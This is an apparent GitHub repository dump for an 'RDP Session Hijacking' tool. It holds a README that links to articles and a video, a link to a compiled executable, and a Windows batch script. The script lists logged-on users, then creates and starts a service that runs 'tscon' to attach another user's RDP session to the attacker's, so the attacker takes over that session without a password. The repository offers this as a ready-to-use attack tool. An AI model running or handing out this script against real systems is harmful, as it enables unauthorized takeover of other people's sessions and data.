├── RDP_SESSION_HIJACK_FRONT.PNG ├── RDP_Session_Hijacking.wmv ├── README.md ├── rdp_session_Hijacking.bat └── rdp_session_Hijacking.exe /RDP_SESSION_HIJACK_FRONT.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crazywifi/RDP_SessionHijacking/2d9588f29dde88933cd3a706f30c4c3822c1ec7b/RDP_SESSION_HIJACK_FRONT.PNG -------------------------------------------------------------------------------- /RDP_Session_Hijacking.wmv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crazywifi/RDP_SessionHijacking/2d9588f29dde88933cd3a706f30c4c3822c1ec7b/RDP_Session_Hijacking.wmv -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | https://niiconsulting.com/checkmate/2018/09/passwordless-rdp-session-hijacking/ 2 | 3 | [![Alt text](https://raw.githubusercontent.com/crazywifi/RDP_SessionHijacking/master/RDP_SESSION_HIJACK_FRONT.PNG)](https://www.youtube.com/watch?v=fYZa3LOX48g) 4 | 5 | For More Details: https://www.linkedin.com/pulse/passwordless-rdp-session-hijacking-rishabh-sharma/ 6 | -------------------------------------------------------------------------------- /rdp_session_Hijacking.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :Ask 3 | 4 | query user 5 | set /p id=Enter ID Number: 6 | set /p sn=Enter Session Name: 7 | set /p an=Enter Any Name of Session (example:sessionhijacking): 8 | %serv% = sc create %an% binpath= "cmd.exe /k tscon %id% /dest:%sn%" 9 | %se% = net start %an% -------------------------------------------------------------------------------- /rdp_session_Hijacking.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crazywifi/RDP_SessionHijacking/2d9588f29dde88933cd3a706f30c4c3822c1ec7b/rdp_session_Hijacking.exe --------------------------------------------------------------------------------